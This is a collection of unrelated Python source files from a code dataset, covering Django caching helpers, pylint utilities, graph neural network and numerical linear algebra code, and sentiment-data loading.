The list of headers to use for cache key generation is stored in the same
cache as the pages themselves. If the cache ages some data out of the
cache, this just means that we have to build the response once to get at
the Vary header and so at the list of headers to use for the cache key.
"""
if key_prefix is None:
key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
if cache_timeout is None:
cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
cache_key = _generate_cache_header_key(key_prefix, request)
if cache is None:
cache = caches[settings.CACHE_MIDDLEWARE_ALIAS]
if response.has_header('Vary'):
is_accept_language_redundant = settings.USE_I18N or settings.USE_L10N
# If i18n or l10n are used, the generated cache key will be suffixed
# with the current locale. Adding the raw value of Accept-Language is
# redundant in that case and would result in storing the same content
# under multiple keys in the cache. See #18191 for details.
headerlist = []
for header in cc_delim_re.split(response['Vary']):
header = header.upper().replace('-', '_')
if header != 'ACCEPT_LANGUAGE' or not is_accept_language_redundant:
headerlist.append('HTTP_' + header)
headerlist.sort()
cache.set(cache_key, headerlist, cache_timeout)
return _generate_cache_key(request, request.method, headerlist, key_prefix)
else:
# if there is no Vary header, we still need a cache key
# for the request.build_absolute_uri()
cache.set(cache_key, [], cache_timeout)
return _generate_cache_key(request, request.method, [], key_prefix)
def _to_tuple(s):
t = s.split('=', 1)
if len(t) == 2:
return t[0].lower(), t[1]
return t[0].lower(), True
```
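A small sketch of the two header-patching helpers above in isolation (assumes Django is installed; settings are configured inline only so an `HttpResponse` can be built):
```python
from django.conf import settings
settings.configure()  # minimal in-memory settings, enough for HttpResponse

from django.http import HttpResponse
from django.utils.cache import patch_cache_control, patch_vary_headers

resp = HttpResponse("ok")
patch_cache_control(resp, max_age=3600, public=True)
patch_vary_headers(resp, ["Accept-Language", "Cookie"])

print(resp["Cache-Control"])  # e.g. "max-age=3600, public"
print(resp["Vary"])           # "Accept-Language, Cookie"
```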
#### File: django/utils/topological_sort.py
```python
class CyclicDependencyError(ValueError):
pass
def topological_sort_as_sets(dependency_graph):
"""
Variation of Kahn's algorithm (1962) that returns sets.
Take a dependency graph as a dictionary of node => dependencies.
Yield sets of items in topological order, where the first set contains
all nodes without dependencies, and each following set contains all
nodes that may depend on the nodes only in the previously yielded sets.
"""
todo = dependency_graph.copy()
while todo:
current = {node for node, deps in todo.items() if not deps}
if not current:
raise CyclicDependencyError('Cyclic dependency in graph: {}'.format(
', '.join(repr(x) for x in todo.items())))
yield current
# remove current from todo's nodes & dependencies
todo = {node: (dependencies - current) for node, dependencies in
todo.items() if node not in current}
def stable_topological_sort(nodes, dependency_graph):
result = []
for layer in topological_sort_as_sets(dependency_graph):
for node in nodes:
if node in layer:
result.append(node)
return result
```
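A usage sketch for the two helpers above; the dependency graph maps each node to the set of nodes it depends on (the example data is ours):
```python
from django.utils.topological_sort import (
    stable_topological_sort, topological_sort_as_sets)

dependency_graph = {
    "settings": set(),
    "models": {"settings"},
    "forms": {"models"},
    "views": {"models", "forms"},
}

print(list(topological_sort_as_sets(dependency_graph)))
# [{'settings'}, {'models'}, {'forms'}, {'views'}]

print(stable_topological_sort(["settings", "models", "forms", "views"], dependency_graph))
# ['settings', 'models', 'forms', 'views']
```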
#### File: pylint/lint/utils.py
```python
import contextlib
import sys
from pylint.utils import utils
class ArgumentPreprocessingError(Exception):
"""Raised if an error occurs during argument preprocessing."""
def preprocess_options(args, search_for):
"""look for some options (keys of <search_for>) which have to be processed
before others
values of <search_for> are callback functions to call when the option is
found
"""
i = 0
while i < len(args):
arg = args[i]
if arg.startswith("--"):
try:
option, val = arg[2:].split("=", 1)
except ValueError:
option, val = arg[2:], None
try:
cb, takearg = search_for[option]
except KeyError:
i += 1
else:
del args[i]
if takearg and val is None:
if i >= len(args) or args[i].startswith("-"):
msg = "Option %s expects a value" % option
raise ArgumentPreprocessingError(msg)
val = args[i]
del args[i]
elif not takearg and val is not None:
msg = "Option %s doesn't expects a value" % option
raise ArgumentPreprocessingError(msg)
cb(option, val)
else:
i += 1
def _patch_sys_path(args):
original = list(sys.path)
changes = []
seen = set()
for arg in args:
path = utils.get_python_path(arg)
if path not in seen:
changes.append(path)
seen.add(path)
sys.path[:] = changes + sys.path
return original
@contextlib.contextmanager
def fix_import_path(args):
"""Prepare sys.path for running the linter checks.
Within this context, each of the given arguments is importable.
Paths are added to sys.path in corresponding order to the arguments.
We avoid adding duplicate directories to sys.path.
`sys.path` is reset to its original value upon exiting this context.
"""
original = _patch_sys_path(args)
try:
yield
finally:
sys.path[:] = original
```
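A usage sketch for `preprocess_options` above: each entry of `search_for` maps an option name to a `(callback, takes_argument)` pair, and matched options are consumed from `args` in place (assumes the function is in scope, e.g. imported from this module; the option names and callback are ours):
```python
seen = {}

def record(option, value):
    seen[option] = value

args = ["--rcfile=pylintrc", "--verbose", "module.py"]
preprocess_options(args, {"rcfile": (record, True), "verbose": (record, False)})

print(seen)  # {'rcfile': 'pylintrc', 'verbose': None}
print(args)  # ['module.py'] -- the processed options were removed
```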
#### File: pylint/utils/file_state.py
```python
import collections
from astroid import nodes
from pylint.constants import MSG_STATE_SCOPE_MODULE, WarningScope
class FileState:
"""Hold internal state specific to the currently analyzed file"""
def __init__(self, modname=None):
self.base_name = modname
self._module_msgs_state = {}
self._raw_module_msgs_state = {}
self._ignored_msgs = collections.defaultdict(set)
self._suppression_mapping = {}
self._effective_max_line_number = None
def collect_block_lines(self, msgs_store, module_node):
"""Walk the AST to collect block level options line numbers."""
for msg, lines in self._module_msgs_state.items():
self._raw_module_msgs_state[msg] = lines.copy()
orig_state = self._module_msgs_state.copy()
self._module_msgs_state = {}
self._suppression_mapping = {}
self._effective_max_line_number = module_node.tolineno
self._collect_block_lines(msgs_store, module_node, orig_state)
def _collect_block_lines(self, msgs_store, node, msg_state):
"""Recursively walk (depth first) AST to collect block level options
line numbers.
"""
for child in node.get_children():
self._collect_block_lines(msgs_store, child, msg_state)
first = node.fromlineno
last = node.tolineno
# first child line number used to distinguish between disable
# which are the first child of scoped node with those defined later.
# For instance in the code below:
#
# 1. def meth8(self):
# 2. """test late disabling"""
# 3. pylint: disable=not-callable
# 4. print(self.blip)
# 5. pylint: disable=no-member
# 6. print(self.bla)
#
# E1102 should be disabled from line 1 to 6 while E1101 from line 5 to 6
#
# this is necessary to disable locally messages applying to class /
# function using their fromlineno
if (
isinstance(node, (nodes.Module, nodes.ClassDef, nodes.FunctionDef))
and node.body
):
firstchildlineno = node.body[0].fromlineno
else:
firstchildlineno = last
for msgid, lines in msg_state.items():
for lineno, state in list(lines.items()):
original_lineno = lineno
if first > lineno or last < lineno:
continue
# Set state for all lines for this block, if the
# warning is applied to nodes.
message_definitions = msgs_store.get_message_definitions(msgid)
for message_definition in message_definitions:
if message_definition.scope == WarningScope.NODE:
if lineno > firstchildlineno:
state = True
first_, last_ = node.block_range(lineno)
else:
first_ = lineno
last_ = last
for line in range(first_, last_ + 1):
# do not override existing entries
if line in self._module_msgs_state.get(msgid, ()):
continue
if line in lines: # state change in the same block
state = lines[line]
original_lineno = line
if not state:
self._suppression_mapping[(msgid, line)] = original_lineno
try:
self._module_msgs_state[msgid][line] = state
except KeyError:
self._module_msgs_state[msgid] = {line: state}
del lines[lineno]
def set_msg_status(self, msg, line, status):
"""Set status (enabled/disable) for a given message at a given line"""
assert line > 0
try:
self._module_msgs_state[msg.msgid][line] = status
except KeyError:
self._module_msgs_state[msg.msgid] = {line: status}
def handle_ignored_message(
self, state_scope, msgid, line, node, args, confidence
): # pylint: disable=unused-argument
"""Report an ignored message.
state_scope is either MSG_STATE_SCOPE_MODULE or MSG_STATE_SCOPE_CONFIG,
depending on whether the message was disabled locally in the module,
or globally. The other arguments are the same as for add_message.
"""
if state_scope == MSG_STATE_SCOPE_MODULE:
try:
orig_line = self._suppression_mapping[(msgid, line)]
self._ignored_msgs[(msgid, orig_line)].add(line)
except KeyError:
pass
def iter_spurious_suppression_messages(self, msgs_store):
for warning, lines in self._raw_module_msgs_state.items():
for line, enable in lines.items():
if not enable and (warning, line) not in self._ignored_msgs:
# ignore cyclic-import check which can show false positives
# here due to incomplete context
if warning != "R0401":
yield "useless-suppression", line, (
msgs_store.get_msg_display_string(warning),
)
# don't use iteritems here, _ignored_msgs may be modified by add_message
for (warning, from_), lines in list(self._ignored_msgs.items()):
for line in lines:
yield "suppressed-message", line, (
msgs_store.get_msg_display_string(warning),
from_,
)
def get_effective_max_line_number(self):
return self._effective_max_line_number
```
#### File: personal-website/personal_website/views.py
```python
from django.shortcuts import render, redirect
from .forms import ConatactMeForm
from django.contrib import messages
# from django.core.mail import send_mail
def about_me(request):
return render(request, "about.html", {})
def resume(request):
return render(request, "resume.html", {})
def contact_me(request):
if request.method == 'POST':
form = ConatactMeForm(request.POST)
if form.is_valid():
cd = form.cleaned_data
# send_mail('jestinmwilson-Form', cd['message'],
# '<EMAIL>', ['<EMAIL>', ])
messages.success(request, 'Your message has been successfully sent')
return redirect('contact-me')
else:
form = ConatactMeForm()
context = {
'form': form,
}
return render(request, "contact-me.html", context)
```
|
{
"source": "jestjest/cs224w-project",
"score": 3
}
|
#### File: old/original-graphsage/models.py
```python
import torch
import torch.nn as nn
from torch.nn import init
from encoders import *
from aggregators import *
class SupervisedGraphSage(nn.Module):
def __init__(self, num_classes, enc, w):
"""
w - array of len(num_classes) indicating the weight of each class when computing
loss.
"""
super(SupervisedGraphSage, self).__init__()
self.enc = enc
self.w = w
self.xent = nn.CrossEntropyLoss(weight=self.w)
self.weight = nn.Parameter(torch.FloatTensor(num_classes, enc.embed_dim))
init.xavier_uniform_(self.weight)
def forward(self, nodes):
embeds = self.enc(nodes)
scores = self.weight.mm(embeds)
return scores.t()
def loss(self, nodes, labels):
scores = self.forward(nodes)
return self.xent(scores, labels.squeeze())
def createGNN(args, features, adj_list, num_features, class_weights):
if args.model_type == 'GraphSage':
agg1 = MeanAggregator(features, cuda=False)
enc1 = Encoder(features, num_features, args.hidden_dim, adj_list, agg1, gcn=False, cuda=False)
enc1.num_samples = 25 # Sample 25 neighbors when aggregating.
return SupervisedGraphSage(len(class_weights), enc1, torch.FloatTensor(class_weights))
```
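The `class_weights` passed to `SupervisedGraphSage` feed straight into `nn.CrossEntropyLoss(weight=...)`, which up-weights mistakes on rare classes. A minimal sketch of that weighting in isolation from the encoder (assumes PyTorch is installed; the numbers are illustrative):
```python
import torch
import torch.nn as nn

class_weights = torch.FloatTensor([1.0, 10.0])  # e.g. penalize errors on class 1 ten times more
xent = nn.CrossEntropyLoss(weight=class_weights)

scores = torch.randn(8, 2)          # raw scores for 8 nodes, 2 classes
labels = torch.randint(0, 2, (8,))  # ground-truth class per node
print(xent(scores, labels))
```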
|
{
"source": "Jeston-de-Anda/SCBI_all",
"score": 2
}
|
#### File: SCBI_all/RoC_Comparisons/various_column.py
```python
import multiprocessing as mp
import numpy as np
import pickle
import datetime
import head_to_head
import sys
def write_stdout():
sys.stdout = open(str(datetime.datetime.today()) + ".log", "w")
def write_stderr():
sys.stderr = open(str(datetime.datetime.today()) + ".err", "w")
# configurations
RANK = 10
SAMPLE_SIZE = 1000000000
SINGLE_SAMPLE_SIZE = 2000
NUMBER_OF_COLUMNS = 2
FOR_LOOP_DEPTH = 500
# functions
def refresh_config():
global RANK, SAMPLE_SIZE, SINGLE_SAMPLE_SIZE, NUMBER_OF_COLUMNS
RANK = 10
SAMPLE_SIZE = 1000000000
SINGLE_SAMPLE_SIZE = 2000
NUMBER_OF_COLUMNS = 2
def sample_mat_default(row_size=RANK, col_size=RANK, size=SINGLE_SAMPLE_SIZE):
'''
default sampling function.
return an array of matrices of shape row_size*col_size,
'''
return np.random.dirichlet([1, ]*row_size,
col_size * size).reshape(-1, col_size, row_size).transpose(0, 2, 1)
def roc_bi(matrices):
'''
    Calculate KL-divergence given an array of matrices. This is
naturally the RoC of BI.
Parameters
----------
matrices: an array of matrices, can be only one matrix. Must be column-normalized!
Return
------
    l*m numpy array of RoC_BI values: for each matrix and each hypothesis taken as true
    (column), the minimum KL-divergence from that column to any other column.
'''
mat = matrices.reshape(-1, matrices.shape[-2], matrices.shape[-1])
l, n, m = mat.shape
log = np.log(mat) # will be used twice, calculate independently.
# next we calculate for each matrix and hypothesis, the KL-divergence,
    # res is an (l,m,m) array: l matrices, axis 1 = reference hypothesis, axis 2 = true hypothesis
res = np.sum(mat.reshape(l, n, 1, m) * (log.reshape(l, n, 1, m) - log.reshape(l, n, m, 1)),
axis=1)
# next find the minimal nonzero elements among the 'other hypotheses'
return np.min(res + np.diag(np.ones(m)*np.inf).reshape(1, m, m), axis=1)
def roc_scbi(matrices):
'''
Calculate the rate of convergence of SCBI.
Parameters
----------
same as roc_bi()
Return
------
same format as roc_bi()
'''
mat = matrices.reshape(-1, matrices.shape[-2], matrices.shape[-1])
l, n, m = mat.shape
logm = np.log(mat)
# print(logm)
# 4 indices: (mat, row-index, other-col-index, true-col-index), same as in BI.
quotient = np.sum(mat.reshape(l, n, m, 1)/mat.reshape(l, n, 1, m), axis=1)
logq = np.log(quotient) + np.diag(np.ones(m)*np.inf).reshape(1, m, m)
# print(logq)
logs = np.mean(logm, axis=1)
other = logs.reshape(l, 1, m) - logs.reshape(l, m, 1) + logq
# print(other)
return np.min(other, axis=1) - np.log(n)
def comparison(matrices):
'''
Comparison of BI and SCBI
Parameters
----------
matrices: same as roc_bi()
Return
------
np.array([avg, prob])
    avg : average of roc_scbi - roc_bi
prob: frequency of roc_bi <= roc_scbi
'''
diff = np.mean(roc_scbi(matrices), axis=1) - np.mean(roc_bi(matrices), axis=1)
return np.array([np.mean(diff), np.mean((diff >= 0))])
def single_round(args):
'''
Single round in multiprocessing
'''
global SINGLE_SAMPLE_SIZE, FOR_LOOP_DEPTH
seed, n, m = args
np.random.seed(seed)
result = np.zeros([FOR_LOOP_DEPTH, 2])
for i in range(FOR_LOOP_DEPTH):
matrices = np.random.dirichlet([1,]*n,
m * SINGLE_SAMPLE_SIZE).reshape(-1, m, n).transpose(0, 2, 1)
result[i,:] = comparison(matrices)
return np.mean(result, axis=0)
def multi_round(n, m):
'''
Multi-Processing
'''
global SAMPLE_SIZE
number_of_process = int(SAMPLE_SIZE / SINGLE_SAMPLE_SIZE / FOR_LOOP_DEPTH)
seeds = np.random.randint(int(2**32), size=number_of_process)
args = [(x, n, m) for x in seeds]
pool = mp.Pool()
print("\n", n, "rows", m, "colums")
result = np.array(pool.map(single_round, args))
pool.close()
return np.mean(result, axis=0)
def run10(start, size, sample=None, single = None):
'''
fix row number, vary column number
'''
global SAMPLE_SIZE, SINGLE_SAMPLE_SIZE
if sample is not None:
SAMPLE_SIZE = sample
SINGLE_SAMPLE_SIZE = single
r = []
print(datetime.datetime.today())
for i in range(start, size + 1):
r += [multi_round(size, i), ]
print("\n", r[-1])
print(datetime.datetime.today())
with open("fix_comparison_"+str(size)+"_by_"+str(i)+".log", "wb") as fp:
pickle.dump(r[-1], fp)
refresh_config()
return r
def run_full(start, size, sample=None, single=None):
'''
square matrix test
'''
global SAMPLE_SIZE, SINGLE_SAMPLE_SIZE
if sample is not None:
SAMPLE_SIZE = sample
SINGLE_SAMPLE_SIZE = single
r = []
print(datetime.datetime.today())
for i in range(start, size + 1):
r += [multi_round(i, i)]
print(r[-1])
print(datetime.datetime.today())
with open("square_"+str(i)+".log", "wb") as fp:
pickle.dump(r[-1], fp)
refresh_config()
return r
if __name__ == "__main__":
pass
```
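A quick usage sketch for the helpers above, comparing the two rates of convergence on a small batch of random 5x3 column-stochastic matrices (assumes `sample_mat_default` and `comparison` above are in scope; importing the whole module also pulls in its `head_to_head` sibling):
```python
import numpy as np

np.random.seed(0)
mats = sample_mat_default(row_size=5, col_size=3, size=100)  # 100 matrices of shape (5, 3)
avg_diff, frac = comparison(mats)
print("mean(RoC_SCBI - RoC_BI):", avg_diff)
print("fraction with RoC_BI <= RoC_SCBI:", frac)
```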
|
{
"source": "jestra52/supor-numerical-analysis-api",
"score": 3
}
|
#### File: src/system_of_equations/factorization.py
```python
import copy as cp
import math as mt
import numpy as np
import threading
class Factorization:
def cholesky(self, A, b):
result = {
'aMatrix': None,
'bMatrix': None,
'lMatrix': None,
'uMatrix': None,
'xMatrix': None,
'iterations': None,
'hasInfiniteSolutions': False,
'resultMessage': None,
'solutionFailed': False,
'error': False,
'errorMessage': None
}
n = len(A)
L = np.zeros((n, n))
U = np.zeros((n, n))
phases = list()
def diagonal_operation_async(k):
incr = 0
for p in range(0, k):
incr += L[k][p] * U[p][k]
L[k][k] = mt.sqrt(A[k][k] - incr)
U[k][k] = L[k][k]
def row_operation_async(k, i):
incr = 0
for r in range(0, k):
incr += L[i][r] * U[r][k]
L[i][k] = (A[i][k] - incr) / L[k][k]
def column_operation_async(k, j):
incr = 0
for s in range(0, k):
incr += L[k][s] * U[s][j]
U[k][j] = (A[k][j] - incr) / L[k][k]
for k in range(0, n):
thread = threading.Thread(target=diagonal_operation_async, args=([k]))
thread.start()
thread.join()
if L[k][k] == 0:
raise ZeroDivisionError
threads = list()
for i in range(k+1, n):
thread = threading.Thread(target=row_operation_async, args=(k, i))
threads.append(thread)
thread.start()
for thread in threads: thread.join()
threads.clear()
for j in range(k+1, n):
thread = threading.Thread(target=column_operation_async, args=(k, j))
threads.append(thread)
thread.start()
for thread in threads: thread.join()
if k < n - 1:
iteration = {
'lMatrix': list(map(lambda l: list(l), cp.deepcopy(L))),
'uMatrix': list(map(lambda u: list(u), cp.deepcopy(U))),
}
phases.append(cp.deepcopy(iteration))
if not result['error']:
result['aMatrix'] = A
result['bMatrix'] = b
result['lMatrix'] = L
result['uMatrix'] = U
result['xMatrix'] = self.solve_x(L, U, b)
result['iterations'] = phases
return result
def doolittle(self, A, b):
result = {
'aMatrix': None,
'bMatrix': None,
'lMatrix': None,
'uMatrix': None,
'xMatrix': None,
'iterations': None,
'hasInfiniteSolutions': False,
'resultMessage': None,
'solutionFailed': False,
'error': False,
'errorMessage': None
}
n = len(A)
L = np.zeros((n, n))
U = np.zeros((n, n))
phases = list()
def column_operation_async(k, j):
incr = 0
for p in range(k):
incr += L[k][p] * U[p][j]
U[k][j] = (A[k][j] - incr)
def row_operation_async(k, i):
incr = 0
for r in range(k):
incr += L[i][r] * U[r][k]
L[i][k] = (A[i][k] - incr) / U[k][k]
for k in range(0,n):
threads = list()
for j in range(k, n):
thread = threading.Thread(target=column_operation_async, args=(k, j))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if U[k][k] == 0:
raise ZeroDivisionError
threads.clear()
for i in range(k, n):
thread = threading.Thread(target=row_operation_async, args=(k, i))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if k < n - 1:
iteration = {
'lMatrix': list(map(lambda l: list(l), cp.deepcopy(L))),
'uMatrix': list(map(lambda u: list(u), cp.deepcopy(U))),
}
phases.append(cp.deepcopy(iteration))
if not result['error']:
result['aMatrix'] = A
result['bMatrix'] = b
result['lMatrix'] = L
result['uMatrix'] = U
result['xMatrix'] = self.solve_x(L, U, b)
result['iterations'] = phases
return result
def crout(self, A, b):
result = {
'aMatrix': None,
'bMatrix': None,
'lMatrix': None,
'uMatrix': None,
'xMatrix': None,
'iterations': None,
'hasInfiniteSolutions': False,
'resultMessage': None,
'solutionFailed': False,
'error': False,
'errorMessage': None
}
n = len(A)
L = np.zeros((n, n))
U = np.zeros((n, n))
phases = list()
def row_operation_async(k, i):
incr = 0
for p in range(0,k):
incr += L[i][p] * U[p][k]
L[i][k] = A[i][k] - incr
def column_operation_async(k, j):
incr = 0
for p in range(0,k):
incr += L[k][p] * U[p][j]
U[k][j] = (A[k][j] - incr) / L[k][k]
for k in range(0, n):
threads = list()
for i in range(k, n):
thread = threading.Thread(target=row_operation_async, args=(k, i))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if L[k][k] == 0:
raise ZeroDivisionError
threads.clear()
for j in range(k, n):
thread = threading.Thread(target=column_operation_async, args=(k, j))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if k < n - 1:
iteration = {
'lMatrix': list(map(lambda l: list(l), cp.deepcopy(L))),
'uMatrix': list(map(lambda u: list(u), cp.deepcopy(U))),
}
phases.append(cp.deepcopy(iteration))
if not result['error']:
result['aMatrix'] = A
result['bMatrix'] = b
result['lMatrix'] = L
result['uMatrix'] = U
result['xMatrix'] = self.solve_x(L, U, b)
result['iterations'] = phases
return result
def solve_z(self, L, b):
n = len(b)
Z = []
for i in range(n):
Z.append(0)
for i in range(0, n):
incr = 0
for p in range(0, i):
incr += L[i][p] * Z[p]
if L[i][i] == 0:
raise ZeroDivisionError
Z[i] = (b[i] - incr) / L[i][i]
return Z
def solve_x(self, L, U, b):
n = len(b)
Z = self.solve_z(L, b)
X = []
for i in range(n):
X.append(0)
i = n - 1
while i >= 0:
incr = 0
for p in range(i+1, n):
incr += U[i][p] * X[p]
if U[i][i] == 0:
raise ZeroDivisionError
X[i] = (Z[i] - incr) / U[i][i]
i -= 1
return X
def get_invertible_matrix(self, L, U):
n = len(L)
invertible_a = []
for i in range(0, n):
b = []
for j in range(0, n):
if j == i: b.append(1)
else: b.append(0)
invertible_a.append(self.solve_x(L, U, b))
return invertible_a
```
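A usage sketch for the `Factorization` class above on a small symmetric positive-definite system (the matrix and right-hand side are ours); `doolittle` and `crout` take the same arguments and return the same result dictionary:
```python
import numpy as np

A = [[4.0, 1.0, 1.0],
     [1.0, 3.0, 0.0],
     [1.0, 0.0, 2.0]]
b = [6.0, 4.0, 3.0]

result = Factorization().cholesky(A, b)
print(result['xMatrix'])                              # solution vector x
print(np.allclose(np.dot(A, result['xMatrix']), b))   # True
```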
#### File: src/system_of_equations/iterative_methods.py
```python
from shared import util
import copy
import math as mt
import numpy as np
import threading
class IterativeMethods():
def gauss_seidel(self, A, b, iterations, tol, l, xi, is_rel_error):
x = copy.deepcopy(xi)
result = {
'error': False,
'errorMessage': None,
'n': 0,
'resultMessage': None,
'solutionFailed': False,
'values': self.build_values(x)
}
if tol < 0:
result['error'] = True
result['errorMessage']= 'Tolerance must be greater or equals than 0'
elif iterations <= 0:
result['error'] = True
result['errorMessage']= 'Iterations must be greater than 0'
else:
m = len(x)
xold = []
for i in range(m):
xold.append(x[i])
x[i] = self.solve_new_x(i,x,l,A,b)
result['values'][f'x{i}'] = np.append(result.get('values').get(f'x{i}'), [x[i]])
error = np.float(util.getMatrixError(is_rel_error, xold, x))
result['values']['error'] = None
n=1
while error > tol and n < iterations:
xold = []
for i in range(m):
xold.append(x[i])
x[i] = self.solve_new_x(i,x,l,A,b)
result['values'][f'x{i}'] = np.append(result.get('values').get(f'x{i}'), [x[i]])
error = np.float(util.getMatrixError(is_rel_error, xold, x))
result['values']['error'] = np.append(result.get('values').get('error'), [error])
n+=1
if error < tol:
result['resultMessage'] = f'The solution was successful with a tolerance={tol} and {n} iterations'
else:
result['resultMessage'] = f'Solution failed for n={n} iterations'
result['solutionFailed'] = True
result['n'] = len(result.get('values').get('x0'))
return result
def jacobi(self, A, b, iterations, tol, l, x, is_rel_error):
result = {
'error': False,
'errorMessage': None,
'n': 0,
'resultMessage': None,
'solutionFailed': False,
'values': self.build_values(x)
}
if tol < 0:
result['error'] = True
result['errorMessage']= 'Tolerance must be greater or equals than 0'
elif iterations <= 0:
result['error'] = True
result['errorMessage']= 'Iterations must be greater than 0'
else:
m = len(x)
n = 0
error = tol + 1
while error>tol and n < iterations:
xnew = np.zeros(m,dtype=np.float64)
#PARALLELISM
threads = list()
for var_index in range(m):
thread = threading.Thread( target=self.solve_new_x_async, args=(A, b, var_index, x, xnew, l, m))
threads.append(thread)
thread.start()
i = 0
for thread in threads:
thread.join()
result['values'][f'x{i}'] = np.append(result.get('values').get(f'x{i}'), [xnew[i]])
i+=1
error = np.float(util.getMatrixError(is_rel_error,x,xnew))
result['values']['error'] = np.append(result.get('values').get('error'), [error])
x = xnew
n+=1
if error < tol:
result['resultMessage'] = f'The solution was successful with a tolerance={tol} and {n} iterations'
else:
result['resultMessage'] = f'Solution failed for n={n} iterations'
result['solutionFailed'] = True
result['n'] = len(result.get('values').get('x0'))
return result
def solve_new_x_async(self, A, b, i, xi, xn, lamb, n):
j = 0
den = 1
sum = b[i]
while den != 0 and j < n:
if(j != i):
sum -= A[i][j] * xi[j]
else:
den = A[i][j]
j += 1
if den != 0:
xn[i] = (lamb*(sum/den) + (1-lamb)*xi[i])
else:
raise ZeroDivisionError
def solve_new_x(self, i, arrX, l, A, b):
n = len(A)
den = 1
incr = b[i]
j = 0
while j < n and den != 0:
if i == j:
den = A[i][j]
else:
incr += (-1) * A[i][j] * arrX[j]
j+=1
if den == 0:
raise ZeroDivisionError
else:
xn = incr / den
xn = l * xn + (1 - l) * arrX[i]
return xn
def build_values(self, x):
values = {}
for i in range(len(x)):
values[f'x{i}'] = np.array([x[i]])
values["error"] = None
return values
def best_lambda_j(self, A, b, x, is_rel_error):
result = {
'error': False,
'errorMessage': None,
'resultMessage': None,
'lambda': None
}
itv = [0,1]
prop = 0.5
resultc = self.jacobi(A, b, 100, 0.000001, prop, x, is_rel_error)
if resultc['n'] <= 2:
result['error'] = True
result['errorMessage']= 'to calculate lambda the iterations must be greater than 2'
else:
while itv[0] != itv[1]:
results = self.jacobi(A, b, 100, 0.000001, prop+0.01, x, is_rel_error)
resulti = self.jacobi(A, b, 100, 0.000001, prop-0.01, x, is_rel_error)
ns = results['n']
ni = resulti['n']
es = results['values']['error'][-1]
ei = resulti['values']['error'][-1]
if ns < ni:
itv = [prop+0.01,itv[1]]
prop = round((itv[0]+itv[1])/2,2)
elif ni < ns:
itv = [itv[0],prop-0.01]
prop = round((itv[0]+itv[1])/2,2)
elif es < ei:
result['resultMessage'] = f'We recommend to use lambda = {prop} in jacobi'
result['lambda'] = prop
return result
else:
result['resultMessage'] = f'We recommend to use lambda = {prop} in jacobi'
result['lambda'] = prop
return result
result['resultMessage'] = f'We recommend to use lambda = {prop} in jacobi'
result['lambda'] = prop
return result
def best_lambda_g(self, A, b, x, is_rel_error):
result = {
'error': False,
'errorMessage': None,
'resultMessage': None,
'lambda': None
}
itv = [0,1]
prop = 0.5
resultc = self.gauss_seidel(A, b, 100, 0.000001, prop, x, is_rel_error)
if resultc['n'] <= 2:
result['error'] = True
            result['errorMessage'] = 'To calculate lambda, the number of iterations must be greater than 2'
else:
while itv[0] != itv[1]:
results = self.gauss_seidel(A, b, 100, 0.000001, prop+0.01, x, is_rel_error)
resulti = self.gauss_seidel(A, b, 100, 0.000001, prop-0.01, x, is_rel_error)
ns = results['n']
ni = resulti['n']
es = results['values']['error'][-1]
ei = resulti['values']['error'][-1]
if ns < ni:
itv = [prop+0.01,itv[1]]
prop = round((itv[0]+itv[1])/2,2)
elif ni < ns:
itv = [itv[0],prop-0.01]
prop = round((itv[0]+itv[1])/2,2)
elif es < ei:
result['resultMessage'] = f'We recommend to use lambda = {prop} in gauss seidel'
result['lambda'] = prop
return result
else:
result['resultMessage'] = f'We recommend to use lambda = {prop} in gauss seidel'
result['lambda'] = prop
return result
result['resultMessage'] = f'We recommend to use lambda = {prop} in gauss seidel'
result['lambda'] = prop
return result
```
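The excerpt above omits the module header, so the enclosing class name, the `numpy`/`threading` imports and the `util.getMatrixError` helper are assumed to exist; `IterativeSolver` below is a hypothetical stand-in for that class. A minimal usage sketch for a small, strictly diagonally dominant system (which guarantees convergence of both methods) might look like this:
```python
# Hypothetical usage sketch; IterativeSolver is an assumed name for the class above.
A = [[10.0, 1.0, 1.0],
     [2.0, 10.0, 1.0],
     [2.0, 2.0, 10.0]]
b = [12.0, 13.0, 14.0]
solver = IterativeSolver()
out = solver.jacobi(A, b, iterations=100, tol=1e-6, l=1.0, x=[0.0, 0.0, 0.0], is_rel_error=False)
print(out['resultMessage'])   # convergence message built by the method
print(out['n'])               # number of iterates stored per variable
out2 = solver.gauss_seidel(A, b, 100, 1e-6, 1.0, [0.0, 0.0, 0.0], False)
```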
|
{
"source": "jestra52/twitter-sentiment-analysis",
"score": 3
}
|
#### File: twitter-sentiment-analysis/ml_source/format_dataset.py
```python
import numpy as np
import os
import pandas as pd
import re
HTML_TAGS = re.compile(r'<.*?>')
SPECIAL_CHARS_NO_SPACE = re.compile(r'[.;:!\'?,\"()\[\]]')
SPECIAL_CHARS_WITH_SPACE = re.compile(r'(<br\s*/><br\s*/>)|(\-)|(\/)')
class FormatDataset:
def load_train_test_imdb_data(self, data_dir):
data = {}
for split in ['train', 'test']:
data[split] = []
for sentiment in ['neg', 'pos']:
score = 1 if sentiment == 'pos' else 0
path = os.path.join(data_dir, split, sentiment)
file_names = os.listdir(path)
for f_name in file_names:
with open(os.path.join(path, f_name), 'r') as f:
review = f.read()
data[split].append([review, score])
np.random.shuffle(data['train'])
data['train'] = pd.DataFrame(data['train'], columns=['text', 'sentiment'])
np.random.shuffle(data["test"])
data['test'] = pd.DataFrame(data['test'], columns=['text', 'sentiment'])
return data['train'], data['test']
def clear_text(self, text):
text = HTML_TAGS.sub('', text.lower())
text = SPECIAL_CHARS_NO_SPACE.sub('', text)
        text = SPECIAL_CHARS_WITH_SPACE.sub(' ', text)  # substitute with a space, as the constant name indicates
return text
```
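A quick, hypothetical check of the cleaning step above (the directory passed to `load_train_test_imdb_data` is assumed to be whatever folder holds the IMDB `train`/`test` split):
```python
# Hypothetical usage sketch of FormatDataset.
fd = FormatDataset()
print(fd.clear_text("An AMAZING film, truly great!"))   # -> an amazing film truly great
# train_df, test_df = fd.load_train_test_imdb_data('aclImdb')  # assumed dataset path
```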
|
{
"source": "jesture-ai/jesture-sdk",
"score": 2
}
|
#### File: python/src/thread_camera_draw.py
```python
from threading import Thread
import logging
import cv2
from PIL import Image, ImageDraw, ImageFont
import matplotlib.pyplot as plt
from skimage import io
import numpy as np
from .utils import draw_skeleton
logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-10s) %(message)s')
class ThreadCameraDraw:
